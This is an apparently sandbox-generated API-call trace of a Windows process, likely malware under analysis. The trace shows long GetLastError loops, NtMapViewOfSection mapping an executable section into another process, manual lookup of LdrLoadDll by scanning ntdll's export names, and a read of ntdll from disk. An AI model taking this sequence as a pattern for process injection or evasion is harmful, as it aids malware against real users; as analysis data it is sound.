	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.457] GetProcAddress (hModule=0x77960000, lpProcName="NtMapViewOfSection") returned 0x779d6f20
	[0070.457] NtMapViewOfSection (in: SectionHandle=0x220, ProcessHandle=0xffffffff, BaseAddress=0x2d0febc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x2d0fdf8*=0, ViewSize=0x2d0fe1c*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2d0febc*=0x2bb0000, SectionOffset=0x2d0fdf8*=0, ViewSize=0x2d0fe1c*=0x18000) returned 0x0
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.457] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetLastError () returned 0x57
	[0070.458] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.458] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0070.458] RtlNtStatusToDosError (Status=0x0) returned 0x0
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.460] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetLastError () returned 0x57
	[0070.461] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.461] GetProcAddress (hModule=0x77960000, lpProcName="NtMapViewOfSection") returned 0x779d6f20
	[0070.461] NtMapViewOfSection (in: SectionHandle=0x220, ProcessHandle=0x224, BaseAddress=0x2d0ff18*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x2d0fe94*=0, ViewSize=0x2d0feb8*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2d0ff18*=0x410000, SectionOffset=0x2d0fe94*=0, ViewSize=0x2d0feb8*=0x18000) returned 0x0
	[0070.473] GetLastError () returned 0x57
	[0070.473] GetLastError () returned 0x57
	[0070.473] GetLastError () returned 0x57
	[0070.473] GetLastError () returned 0x57
	[0070.473] GetLastError () returned 0x57
	[0070.473] GetLastError () returned 0x57
	[0070.473] GetLastError () returned 0x57
	[0070.473] GetLastError () returned 0x57
	[0070.473] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetLastError () returned 0x57
	[0070.474] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.475] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0070.475] RtlNtStatusToDosError (Status=0x0) returned 0x0
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetLastError () returned 0x57
	[0070.475] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetLastError () returned 0x57
	[0070.476] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x771a08, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0070.476] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrLoadDll") returned -1
	[0070.476] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgPrint", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrLoadDll") returned -1
	[0070.477] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="KiFastSystemCall", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="KiFastSystemCallRet", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="KiIntSystemCall", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrLoadDll") returned -1
	[0070.478] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="LdrLoadDll") returned -1
	[0070.479] lstrcmpA (lpString1="LdrLoadDll", lpString2="LdrLoadDll") returned 0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.479] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetLastError () returned 0x0
	[0070.480] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.480] GetProcAddress (hModule=0x765a0000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x765db4f0
	[0070.480] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1
	[0070.482] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230
	[0070.482] SetFilePointer (in: hFile=0x230, lDistanceToMove=996048, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf32d0
	[0070.482] ReadFile (in: hFile=0x230, lpBuffer=0x2d0fe0c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2d0fe10, lpOverlapped=0x0 | out: lpBuffer=0x2d0fe0c*, lpNumberOfBytesRead=0x2d0fe10*=0x4, lpOverlapped=0x0) returned 1
	[0070.484] CloseHandle (hObject=0x230) returned 1
	[0070.484] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x771a08, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
